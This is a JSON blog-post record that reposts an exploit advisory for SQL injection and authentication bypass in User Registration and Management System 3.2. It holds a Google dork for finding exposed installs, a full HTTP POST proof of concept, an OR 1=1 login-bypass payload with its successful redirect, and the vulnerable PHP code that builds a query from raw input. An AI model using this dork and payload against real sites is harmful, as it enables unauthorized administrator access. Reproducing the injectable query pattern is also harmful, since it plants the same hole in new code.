{"id":57586,"date":"2024-06-19T15:50:57","date_gmt":"2024-06-19T12:50:57","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179147\/urms32-sql.txt"},"modified":"2024-06-19T15:50:57","modified_gmt":"2024-06-19T12:50:57","slug":"user-registration-and-management-system-3-2-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/user-registration-and-management-system-3-2-sql-injection\/","title":{"rendered":"User Registration And Management System 3.2 SQL Injection"},"content":{"rendered":"
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.:. Exploit Title > User Registration & Management System - SQLi
.:. Google Dorks .:.
inurl:loginsystem\/index.php
.:. Date: June 18, 2024
.:. Exploit Author: bRpsd
.:. Contact: cy[at]live.no
.:. Vendor -> https:\/\/phpgurukul.com\/
.:. Product -> https:\/\/phpgurukul.com\/?sdm_process_download=1&download_id=7003
.:. Product Version -> Version 3.2
.:. DBMS -> MySQL
.:. Tested on > macOS [*nix Darwin Kernel], on local xampp
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#############
|DESCRIPTION|
#############
\"User Management System is a web based technology which manages user database and provides rights to update the their details In this web application user must be registered. This web application provides a way to effectively control record & track the user details who himself\/herself registered with us.\"
===========================================================================================
Vulnerability 1: Unauthenticated SQL Injection & Authentication bypass
Types: error-based
File: localhost\/admin\/index.php
Vul Parameter: USERNAME [POST]POST PoC #1: http:\/\/tom:8080\/loginsystem\/admin\/index.php
Host: tom
User-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko\/20100101 Firefox\/127.0
Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application\/x-www-form-urlencoded
Content-Length: 38
Origin: http:\/\/tom
Connection: keep-alive
Referer: http:\/\/tom\/loginsystem\/admin\/index.php
Cookie: PHPSESSID=fca5cef217b48f9ec0221b75695e4f2a
Upgrade-Insecure-Requests: 1
username='&password=test&login=
Response: Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, bool given in \/Applications\/XAMPP\/xamppfiles\/htdocs\/loginsystem\/admin\/index.php on line 9
===========================================================================================
Test #2 => Payload to skip authentication
http:\/\/localhost:9000\/loginsystem\/admin\/index.php
username=A' OR 1=1#&password=1&login=
Response:
302 redirect to dashboard.php
===========================================================================================
Vuln File:\/loginsystem\/admin\/index.php
Vul Code:
<?php session_start();
include_once('..\/includes\/config.php');
\/\/ Code for login
if(isset($_POST['login']))
{
$adminusername=$_POST['username'];
$pass=md5($_POST['password']);
$ret=mysqli_query($con,\"SELECT * FROM admin WHERE username='$adminusername' and password='$pass'\");
$num=mysqli_fetch_array($ret);
if($num>0)
<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.:. Exploit Title > User Registration & Management System – SQLi.:. Google Dorks .:.inurl:loginsystem\/index.php.:. Date: June 18, 2024.:. Exploit Author: bRpsd.:. Contact: cy[at]live.no.:. Vendor -> https:\/\/phpgurukul.com\/.:. Product -> https:\/\/phpgurukul.com\/?sdm_process_download=1&download_id=7003.:. Product Version -> Version 3.2.:. DBMS -> MySQL.:. Tested on > macOS [*nix Darwin Kernel], on local xampp@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#############|DESCRIPTION|#############”User Management System is a web based technology which …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57586","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57586","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57586"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57586\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57586"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57586"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57586"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}